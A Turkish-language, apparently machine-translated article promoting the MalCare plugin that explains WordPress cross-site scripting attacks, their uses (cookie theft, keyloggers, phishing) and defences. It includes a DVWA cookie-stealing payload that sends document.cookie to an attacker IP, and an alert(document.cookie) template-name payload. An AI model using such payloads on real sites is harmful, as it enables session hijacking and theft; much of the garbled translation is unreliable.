WordPress XSS Saldırısı: Nasıl Önlenir
WordPress XSS için endişeleniyorsanız, paranoyak değil bilge olduğunuzu söyleyerek başlayalım. Cross -Site komut dosyalarının güvenlik açığı WordPress web sitesi ile sınırlı değildir, aynı zamanda bunu da etkiler. En iyi savunma bir güvenlik duvarı kurmak ve temanızı ve eklentinizi güncellemeye devam etmektir. Bu makalede, bu güvenlik açığının tam olarak ne olduğunu belirleyeceğiz – ve sabırlı olun, teknik olacak – böylece web sitenizin güvenliği hakkında doğru kararları verebilirsiniz. Kontrol etmenizi önerdiğimiz saldırıların nasıl önleneceğine dair tam bir rehberimiz var.
TL; DR.: WordPress sitenizin saldırıya uğradığından şüpheleniyorsanız, kötü amaçlı yazılımları hemen sitenizden kaldırmak için Malcare’i yüklemenizi öneririz.
Doldurma gizle
WordPress XSS nedir?
XSS saldırısı neden bu kadar yaygın?
Web sitem XSS saldırılarına karşı savunmasız mı?
Tüm XSS saldırıları tehlikeli mi?
Bilgisayar korsanları böyle bir güvenlik açığından nasıl yararlanır?
XSS saldırılarından nasıl korunur?
Sitenizdeki WordPress XSS saldırıları nasıl tespit edilir
XSS nasıl çalışır?
Çapraz site komut dosyaları türleri
Sıradaki ne?
SSS
WordPress XSS nedir? WordPress XSS, WordPress sitesindeki çapraz alan komut dosyalarının güvenlik açığı kullanılarak gerçekleştirilen bir kötü amaçlı yazılım saldırısıdır. Bu, özellikle XSS güvenlik açığı olan birçok eklenti olduğu için, WordPress sitesinin en yaygın yoludur.
Peki çapraz yerinde senaryo nedir? Cross -Site veya XSS komut dosyaları, web sitelerinde yetkisiz JavaScript kodunun yürütülmesini sağlayan güvenlik açığıdır. Aslında, bu en yaygın web sitesinin güvenlik açığıdır ve yakalamak çok zordur, çünkü bu güvenlik açığından yararlanan saldırı birçok türde olabilir. Bu özellikle büyük ve karmaşık web siteleri için geçerlidir. Birçok saldırı türü vardır, ancak netlik için iki kategoriye ayrılabilirler: Tehlikeli komut dosyaları tarayıcıdaki müşterinin yanında çalıştırılır;
Veya tehlikeli komut dosyalarının sunucuda saklandığı ve yürütüldüğü ve daha sonra bir tarayıcı tarafından servis edildiği;
Her iki durumda da, bilgisayar korsanları verileri çalmak veya sitenin görünümünü ve davranışını manipüle etmek için XSS saldırılarını kullanabilir.
Bu, çapraz alan komut dosyalarının basit bir sürümüdür. Bu makalenin sonunda daha ayrıntılı bir açıklama bulabilirsiniz. XSS saldırısı neden bu kadar yaygın? WordPress eklentileri çok karmaşık olabilir. Bazen WordPress’in kendisinden bile daha karmaşıktır. Daha büyük bir karmaşıklıkla, güvenlik sorunları olasılığı sadece artar. XSS saldırılarının, eklenti üreticilerinin daha zor çalışmasını sağlamaktan korunması çok zordur. Google, Apple, Facebook ve diğerleri gibi özel güvenlik ekiplerine sahip en iyi web şirketlerinden bazıları bile bu tür saldırıları yaşar. Bu, her şeyi WordPress eklentisine çok daha az kaynakla nasıl sızabileceğine dair bir perspektife yerleştirmeye yardımcı olacaktır.
Web sitem XSS saldırılarına karşı savunmasız mı? Bir güvenlik duvarınız varsa ve her zaman her şeyi güncelleyin, olasılık çok daha düşüktür. Ancak bu tür saldırılara karşı çok kolay bir koruma olmadığını unutmayın. Bilgisayar korsanları tarafından sömürülebilecek kamuya açık olmayan güvenlik açığı olabilir. Bu nedenle, bir güvenlik eylemi olarak, web sitenizi düzenli olarak tarayın. Bu tür güvenlik açığının neden olduğu hasar, sorunun kesin ayrıntılarına bağlı olsa da, en kötü durumda, tüm siteler bilgisayar korsanları tarafından devralınabilir. Bazı durumlarda, bilgisayar korsanları sitede küçük değişiklikler yapabilir, sitenizi kendi kötü sitelerine yönlendirebilir. Başka bir deyişle, bilgisayar korsanları tarayıcınızı şu şekilde kullanabilir:
Oturum kimliğini koklayarak kullanıcı oturumunu ele geçirme
Pop-up ve yasadışı transfer
Kimlik avı saldırısı başlatın
Kurban tarafından her düğmeye basmayı kaydeden Keylogger’ı yükleyin
Finansal Bilgileri Çalın
Bu tür saldırılardan kurtulmanın tek bir yolu vardır. Malcare Güvenlik Duvarı’nı hemen yükleyin. Tüm XSS saldırıları tehlikeli mi? Değil. Bazı XSS saldırıları çok daha tehlikelidir, çünkü sitenize tam erişim sağlayabilirler. Bilgisayar korsanları daha sonra siteyle istediklerini yapabilir.
Diğerleri, bilgisayar korsanlarının sitenin sadece küçük bir bölümünü değiştirmesine izin verir. Bu, ziyaretçilerinize sunulan kötü amaçlı yazılımlar ve daha fazlası için çok tehlikeli olabilir. Bazı XSS saldırıları, bilgisayar korsanlarının site katkıda bulunmasını gerektirebilir. Bu durumda, neden olan tehlikeler çok daha düşüktür. Bilgisayar korsanları böyle bir güvenlik açığından nasıl yararlanır? Çoğu bilgisayar korsanı güvenlik açığı bulmak için otomasyonu kullanır. Bundan sonra, hack’i yürüt. Bazı durumlarda, tüm saldırılar botlar tarafından gerçekleştirilebilir. Hacker’ların pratik olarak çapraz alan komut dosyalarını kullanabileceği 5 temel yol olduğunu önceden söyledik. Tüm varyantları tek tek yönlendirelim. Şimdi, çerez almanın en tehlikeli kısmı, aynı hacklemenin kullanıcı oturum kimliğini ortaya çıkarabileceğidir. Çoğu web sitesi oturumları her kullanıcı için benzersiz bir kimlik olarak kullanır. Bu oturum çerez oturumunda saklanır. Bunun gibi basit bir komut dosyası kullanmak: http: // localhost: 81/dvwa/güvenlik açığı/xss_r/? Name = yeni görüntü (). + Document.cookie; Bir hacker, siteye bir çerez oturumu gönderebilir http://192.168.149.128/ ve bu istek sunucudaki Access.log dosyasını girer.
Şimdi, bu oturum bilgilerini kullanarak, bilgisayar korsanları şifreye ihtiyaç duymadan girdiğiniz herhangi bir hesabı kolayca girebilir. #2 Geçersiz Etkinlikler Yapın Hacker’ların çerezleri çalmak için JavaScript kullanamayacağı bazı örnekler vardır. Bu durumda, yetkisiz faaliyetler yürütmek için XSS saldırılarını kullanmaya çalışırlar. Örneğin, blog yayınınızın yayınlanmaya devam eden yorumlarında görünen mesaj. Bu tür bir saldırı, daha fazla kullanıcıya yayılmaya devam eden tehlikeli bir siteye veya komut dosyasına zarar verebilir. #3 Kimlik avı saldırıları Birçok durumda, XSS WordPress saldırıları çok daha büyük bir plan için sadece ilk yerlerdir. Sitenizde kimlik avı saldırılarına yol açan bir çapraz yerinde bir komut dosyası da vardır. Çoğu durumda, tehlikeli senaryolar, sitenizde kullanıcılarınızı hassas bilgilerini sağlamaya kandıracak kimlik avı sahtekarlığı teşvik etmeye başlar. Kimlik avı saldırıları hakkında makalelerimiz var, bu yüzden daha fazla bilgi edinmek istiyorsanız okuyun. #4 Keylogger’ı bu saldırı senaryosunda yükleyen bilgisayar korsanları, Keylogger’ı savunmasız bir siteye koyan komut dosyasını uygular. Kullanıcı bir şey her yazdığında, Keylogger onu saklayacak ve hacker’a geri gönderecektir. Bu tehlikeli bir saldırıdır ve anında bir şifre ve kredi kartı bilgileri çalabilir. JavaScript dosyası aşağıdaki kodu içerir:
Kredi resmi: Pentesttools
Bu kodda, JavaScript’in ‘keylog.php’ adlı bir dosya açtığını göreceksiniz. Dosyadaki kod, kullanıcının klavyesi tarafından data.txt adlı bir dosyaya basılan tüm düğmeleri saklar.
Kredi resmi: Pentesttools
Bu tekniği kullanarak, bilgisayar korsanları enfekte olmuş bir sitede tam olarak ne yazdığınızı kolayca okuyabilir. #5 Hassas bilgileri çalmak çerezler ve bunların nasıl çalınabileceği hakkında biraz konuştuk. Bu tür bir saldırı sadece aynı prensibi daha da ileri götürür. Banka bankacılığı sayfanızın XSS saldırılarına karşı savunmasız olduğunu hayal edin. Doğru komut dosyasını kullanarak, bilgisayar korsanları doğrulama yapmadan doğrudan banka hesabınızı girebilir! Yine, bu yeni bir kavram değil. Bu, bilgisayar korsanlarının bir çerez oturumu ile yapabileceklerinin bir uzantısıdır. XSS saldırılarından nasıl korunur? Güvenlik duvarı, büyüyen bir tehditle karşılaşmada en iyi savunmanızdır. Güvenlik duvarları, genellikle XSS saldırılarında bulunan şüpheli metinler içerebilecek talep arayan özel kurallara sahiptir. Sorun şu ki, bilgisayar korsanları en akıllı güvenlik duvarlarından bazılarını geçebilecek bu tehlikeli metinden daha akıllı varyasyonlar yapmaya devam ediyor. Bu her zaman en iyi çözüm değil. Bu bir kedi ve fare oyunudur ve genellikle sahte pozitifler alabilir. Kontrol etmeniz gereken WordPress sitesinin nasıl güvence altına alacağınız hakkında bir makalemiz var. Sitenizdeki XSS WordPress saldırıları nasıl tespit edilir Sitenizdeki XSS saldırılarını algılamanın en basit yolu Malcare gibi güvenlik eklentilerini yüklemektir. Malcare, sitenizi her gün tarayan otomatik bir kötü amaçlı yazılım tarayıcısına sahiptir. En iyi makine öğrenimi algoritması ile, kötü amaçlı yazılım tarayıcıları sitenizde herhangi bir yerde tehlikeli komut dosyalarını algılar. Malcare bilinmeyen bir kötü amaçlı yazılım bile buldu ve size ‘otomatik temizlik’ seçeneğini verdi.
Ekip üyelerinizin veya yönetici üyelerinizin IP adresi siteye erişmek için yanlışlıkla engellenirse, endişelenmeyin! Beyaz listeye IP adresini nasıl gireceğinizle ilgili kılavuzumuza bakın. XSS nasıl çalışır? Bilgisayar korsanları tarafından başlatılan saldırı türüne bağlı olarak, çeşitli çapraz alan komut dosyaları vardır. Hepsinin ortak bir şeyi var – hepsi kötü amaçlı yazılım yaymak için JavaScript kullanıyor. JavaScript, Web sayfaları için HTML kodu arasındaki bir dildir. Şimdi, JavaScript çok güçlü hesaplamalar yapan değişkenler yapabilir. Böylece, hayal edebileceğiniz hemen hemen her şeyi yapmak için kullanabilirsiniz. Örneğin, ödeme ayrıntılarını alan ve WordPress veritabanında depolayan bir Woocommerce web siteniz olduğunu varsayalım. Kredi kartı detayları göndermek ve diğerlerine giriş verileri göndermek için JavaScript kullanabilirsiniz! Bu nedenle, bir hacker JavaScript’i yürütmek için site kodunuzdaki güvenlik açığından yararlandığında, bir XSS saldırısıdır. Genellikle, bu tür bir güvenlik açığı, sitenizde kullanıcının veri girebileceği herhangi bir yerde meydana gelir. Buna açılır pencereler, formlar, arama bıçakları, hatta URL’nizi bile dahildir. Şimdi, bu veri giriş alanının görsel bir alan olması gerekmiyor. Site kodunuzda, herhangi bir dosya veya veritabanından temiz olmayan verileri alan yanlış değişken bile olabilir. WordPress Core, XSS saldırılarına karşı da savunmasızdır. Başlangıçta, XSS’yi yürütmek için hacklenmesi gereken şey, içinde aşağıdaki kod satırlarına sahip bir PHP dosyası oluşturmaktır:/ * Şablon Adı: Onaylama (Document.cookie); //
Bu WordPress XSS saldırısına bir örnektir. Şablonun adı WordPress tema düzenleyicisi tarafından olduğu gibi alınacağından daha uzun WordPress sürümü yakında bunu yürütecektir. Tema düzenleyicisi, XSS saldırılarına karşı hiçbir önlemi olmayan ‘$ files_description’ işlevini kullanarak şablonun adını alır. Tabii ki, yukarıdaki örnekteki senaryo çok güçlü veya tehlikeli değildir. Ama nokta hala aynı. İyi huylu kod herhangi bir girdi alanında yürütülebilirse, tehlikeli kodlar da olabilir! Bu özel hack, WordPress sürüm 4.8.2’de yamalanmıştır, ancak aynı güvenlik açığı birçok WordPress teması ve eklentisinde bulunur. Aslında, birçok WordPress eklentisinde ana sorun budur. Gerçek şu ki, çoğu eklenti çok karmaşık olabilir. Bazıları WordPress Core dosyalarından daha karmaşıktır. Bu karmaşıklık seviyesi genellikle güvenlik sorunlarına neden olabilir. WordPress XSS böyle çalışıyor. WordPress’in eski sürümünü çalıştırırsanız, hemen güncellemenizi şiddetle tavsiye ederiz. Ayrıca, bu, XSS güvenlik açığı olduğu bilinen WordPress eklentilerinin bir listesidir. Mümkün olduğunca kaçınmanızı şiddetle tavsiye ediyoruz. Bu eklentilerden birini kullanırsanız, bu yama güvenlik açığı ve en son sürümde güncellemeler olup olmadığını öğrenin. Çapraz yer komut dosyaları türleri esas olarak öğrenmeniz gereken iki tür XSS saldırısı vardır: XSS saldırıları saklanır veya kalıcıdır – bu saldırının hedefleri web sitenize ziyaretçidir. Müşterileri aldatıyorlar, kişisel bilgilerini ve fonlarını çalıyorlar.
İki saldırıyı ayrıntılı olarak açıklayacağız. XSS saldırıları depolanır veya kalıcı olarak web sitenize, insanların yayınladığınız makaleler hakkında yorum yapmalarını sağlayan bir blog olarak düşünün. Ziyaretçiler yorum bıraktıklarında veriler veritabanına gönderilir ve saklanır. Sitenizin veritabanına gönderilmeden önce verileri temizlemek için bir yapılandırmaya sahip olması gerekir. Bu, kullanıcının sıradan bir yoruma dahil olup olmadığını veya tehlikeli bir komut dosyası olup olmadığını kontrol etmesi gerektiği anlamına gelir. Bu sınav yapılmazsa, bu WordPress XSS’nin zayıf yönlerini açacaktır. Nasıl bir bakalım: Adım 1: Hacker’lar güvenlik açığı bulur ve internetten geçmek ve XSS güvenlik açığı olan web sitelerini bulmak için otomatik tarayıcılar kullanarak bilgisayar korsanlarını kullanırlar. Sitenizi bulduktan sonra, yorumlarınıza tehlikeli bir senaryo girerler. Web sitenizin sınavı olmadığı için bir komut dosyası alır ve veritabanına gönderir. Adım 2: Ziyaretçiler ziyaretçiler için enfekte bir sayfa görüyor, girdi bilgisayar korsanları sıradan yorumlara benzeyecek. Ziyaretçilerin ve site sahiplerinin bilmediği şey, bu yorumun çerezleri çalmak için tasarlanabilecek bir kod olduğudur. Yalnızca bu sayfayı ziyaret eden herkes etkilenecektir. Adım 3: Hacker bir tarayıcı çerezini çalıyor Sıradan kullanıcıların genellikle e -posta, Facebook, Amazon, Work Web Siteleri, YouTube gibi alışveriş siteleri gibi tarayıcılarda çok sayıda sekme açtığını biliyoruz. Yorumlar, kod çalıştırıyor. Bu, bilgisayar korsanlarının tarayıcı çerezlerini çalmalarını sağlar. Bu saldırıya ‘Siteler Arası’ denir
Cross -Site veya XSS komut dosyaları, web uygulamalarında bulunan kamu güvenlik açığıdır. Güvenlik açığı, bilgisayar korsanlarının tarayıcınızdaki tehlikeli kodları yürütmesine olanak tanır. XSS güvenlik açığı kullanan her siber saldırı XSS saldırıları olarak bilinir.
XSS saldırılarının örnekleri nelerdir?
XSS saldırıları çok popüler ve oldukça şiddetli. Doğal olarak, şifreler ve kişisel bilgiler çalmak için Facebook, YouTube ve Google dahil olmak üzere dünyanın en büyük şirketlerinden bazılarıyla savaşmak için kullanılmıştır.
XSS neden tehlikeli?
Çapraz yerinde komut dosyaları çok tehlikelidir. Güvenlik açığı bulmak için kullanılan botlara ve bilgisayar korsanlarını kodlama yeteneğine bağlı olarak, saldırganlar her türlü hassas bilgiyi çalabilir. Bunu korumak da çok zordur çünkü XSS için genel bir şablon yoktur ve tespit edilmesi çok zordur.
Sitenizi XSS saldırılarından nasıl koruyabilirsiniz?
Kendinizi XSS saldırılarından korumanın en basit yolu, tehlikeli trafiği etkili bir şekilde engelleyebilecek bir güvenlik duvarı kurmaktır. WordPress için, web sitenizi sıradan hacklemeden güçlendirmenizi öneririz.